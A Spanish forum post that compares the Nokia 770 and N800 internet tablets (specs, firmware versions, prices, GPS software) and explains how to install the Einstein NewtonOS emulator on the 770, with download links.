Según Nokia, dura 3´5 horas, es decir 30 minutos más con la misma batería, es de suponer que han rebajado el consumo de la maquina, y es de suponer que no sera usando la WEB CAM
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Sistemas operativos / Software
OS prorporcionado-----------------------------Internet Tablet OS 2006 (3ª Rev.)
Nokia 800 Sistemas operativos / Software
OS prorporcionado-----------------------------Internet Tablet OS 2007
El [span style=\'font-size:25pt;line-height:100%\']Flasher 3.0[/span] es compatible a ambos sistemas, pero ambos sistemas son especificos de cada maquina, no se puede flashear el N770 con el OS del N800, ni viceversa
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Parámetros de entorno
Temperatura mínima de funcionamiento--------10 °C
Temperatura máxima de funcionamiento--------55 °C
[span style=\'font-size:25pt;line-height:100%\']Nokia 770[/span]; Equipado con navegador Opera, VoIP, mensajería instantánea Google Talk, lector de RSS, radio vía internet, lector PDF y compatibilidad Flash v6
[span style=\'font-size:25pt;line-height:100%\']Nokia 800[/span]: Equipado con Web Browser (Opera 8) con Flash player (v7), llamada desde Internet con video-conferencia, Mensajeria Instantanea, Email, Media player, Internet Radio, RSS Feed Reader
[span style=\'font-size:30pt;line-height:100%\']La CPU, el cerebro de la maquina:[/span]
Nokia 800 (320 Mhz) con 70 Mhz más de mejora sobre el Nokia 770 (250Mhz), sin duda se notara más en cuanto al volumen de trabajo la mejora del N800 al doble de RAM (128) así como el almacenaje de programas del doble de ROM (256) en ventaja de la revision del Internet Tablet de 2007 (de 1 año y dos meses de diferencia).
Recordamos que el Nokia 770 salió al mercado en noviembre de 2005 y que estaba fabricado en Alemania sin olvidar que esta gama de Nokia Tablet PC cuentan con Linux Debian Maemo Edicion y su diseñado principalmente es destinado para un uso como una terminal de conexión a internet. NO es PDA, no es PC.
Ambas versiones admiten navegación GPS mediante el paquete Navicore para mapeados de carretera, o Mapper para topografica mediante Google Maps, con su correspondiente antena GPS mediante conexión Bluetooth
# Navicore; Navegacion GPS para N770 y versión específica para el nuevo Nokia Tablet 800, con gráficos a alta resolución y compatible con el entorno Linux que incorpora.
Los mapas son los de Teleatlas, y estarán disponibles los de Europa, Norte América, Australia y parte de África. Se prevé que durante el primer trimestre de este año esté lista la versión definitiva aunque de momento el precio es una incógnita. Como referencia tenemos a la versión con todos los mapas europeos para el Nokia Tablet 770 a 149 euros.
Nokia 770; Tiene un procesador OMAP 1710 de Texas Instruments que trabaja a una frecuencia de 250 MHz (basado en arquitectura ARM del procesador ARM926TEJ con un DSP TMS320C55x)
Nokia 800; Tiene un procesador procesador TI Omap 2420 de 320Mhz, además de la mejora de RAM 128MB (Por 64) y ROM 256MB flash (del anterior 128), la novedad es la cámara web VGA, y los 2 slot para tarjetas SD, altavoces estereo
Versión Tablet 0S de Nokia 770
Nokia_770_3.2005.51-13.bin
Nokia_770_SE2005_5_2006_13_7.bin
SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM.bin
SU-18_2006SE_2.2006.39-14_PR_F5_MR0_ARM.bin
SU-18_2006SE_3.2006.49-2_PR_F5_MR0_ARM.bin
* A la espera de la 07 Hacked Edition N770 -2.2006.39-
14_PR_F5_MR0_ARM.bin -
Versión Tablet 0S 2007 de Nokia 800
Version: 1.2006.47-20
En la actualidad se pueden encontrar a la venta las 2 maquinas
Nokia 770 por un precio de 345 euros, visto en Expanys
Nokia 800 por un precio desde su WEB de 399 euros
-
[span style=\'font-size:21pt;line-height:100%\']Emulador para Nweton Einsten sobre Maemo Nokia 770[/span]
DESCARGAR; Einstein Platform 2006 Beta 1 (Nokia 770)
http://www.kallisys.com/files/newton/Einst...06-nokia770.tgz (http://www.kallisys.com/files/newton/Einstein/EinsteinPlatform2006-nokia770.tgz)
Dentro estan las Instrucciones, por si algún avezado forero se atreve a trastear con su N770
Ahora que anda la cosa aburrida que bueno es exprimir la sustancía del viejo Maemo.
Booting Einstein on the 770 (http://cs.gmu.edu/~sean/stuff/n800/newton2.jpg)
[span style=\'font-size:30pt;line-height:100%\']Arrancando el emulador Eistein[/span] (http://www.dillernet.com/apple/2006/01/21/booting-einstein-on-the-770/) [img]http://cs.gmu.edu/~sean/stuff/n800/emate.gif\" border=\"0\" class=\"linked-image\" /]
http://cs.gmu.edu/~sean/stuff/n800/ (http://cs.gmu.edu/~sean/stuff/n800/)
[img]http://cs.gmu.edu/~sean/stuff/n800/einstein.png\" border=\"0\" class=\"linked-image\" /]
WEB; http://www.kallisys.com/ (http://www.kallisys.com/ )
Está versión del emulador NewtonOS, precursor maquero de los PDA actuales y proyecto abandonado por Apple en 1998, ha sido especialmente diseñada para los desarrolladores que sienten interés en las funciones de este sistema operativo. El objetivo de Einstein Platform es crear un porte X11, de tal forma que NewtonOS esté compatible con los dispositivos ARM corriendo bajo Linux.
Para que funcione este emulador, necesitarás instalar una plataforma Linux que soporte las X11 en tu PDA, así como una Newton MP2x00 a mano para poder extraer la ROM. Una vez la Rom esté extraída, hay que renombrarla 717006 y meterla en la misma carpeta que el fichero Einstein.rex. Arranca las X11 y el emulador con la línea siguiente: $ einstein "ruta de la carpeta".
Una vez funcionando, accederás al NewtonOS desde tu PDA, como si lo estuvieras usando desde el PDA original de Apple. La emulación es estable y casi 100% funcional, es decir que aún está en fase de desarrollo y le falta funciones de optimización, así como compatibilidad con tarjetas PCMCIA por ejemplo. La Descarga Privada incluye los paquetes compilados para OpenZaurus 3.5.4, PepperPad 2 y Nokia 770.
Requisitos mínimos de Einstein Platform:
· S.O.: X11
· OpenZaurus 3.5.4, PepperPad 2 o Nokia 770
· ROM MP2x00 US
[img]http://images.softonic.com/s2/48000/48338/0_zaurus.jpg\" border=\"0\" class=\"linked-image\" /]
http://descargas.terra.es/ie/48338/Einstein_Platform (http://descargas.terra.es/ie/48338/Einstein_Platform)
[img]http://homepage.mac.com/dillera/.Pictures/Photo%20Album%20Pictures/2006-01-18%2011.03.37%20-0800/Image-D8D12B4E885411DA.jpg\" border=\"0\" class=\"linked-image\" /]
http://www.todosymbian.com/gate.html?name=...ighlight=newton (http://www.todosymbian.com/gate.html?name=Forums&file=viewtopic&t=24705&highlight=newton)
Bajar Rom Newton:
http://www.geocities.com/newtonresurrection/indexspecs.html (http://www.geocities.com/newtonresurrection/indexspecs.html)
http://newton.vyx.net/downloads (http://newton.vyx.net/downloads)
Bajar el paquete de Estein sobre Nokia 770
http://www.kallisys.com/newton/einstein/ (http://www.kallisys.com/newton/einstein/)
Tener SSH sobre wifi, BT o USBnet (http://maemo.org/maemowiki/HowToSetUpUsbNetworkingDebian)
Por supuesto ser "administrador/root"
http://newton.vyx.net/downloads (http://newton.vyx.net/downloads)
Newton 2100 Branch Map (http://newton.vyx.net/downloads/BMap2100.zip)
This file contains parts of dissassebled ROM image. Specifically, only symbols and branch instructions are included. This is very handy, if you want to check where specific function is called or get general impression of actions performed by calling any function. Symbol names are unmangled.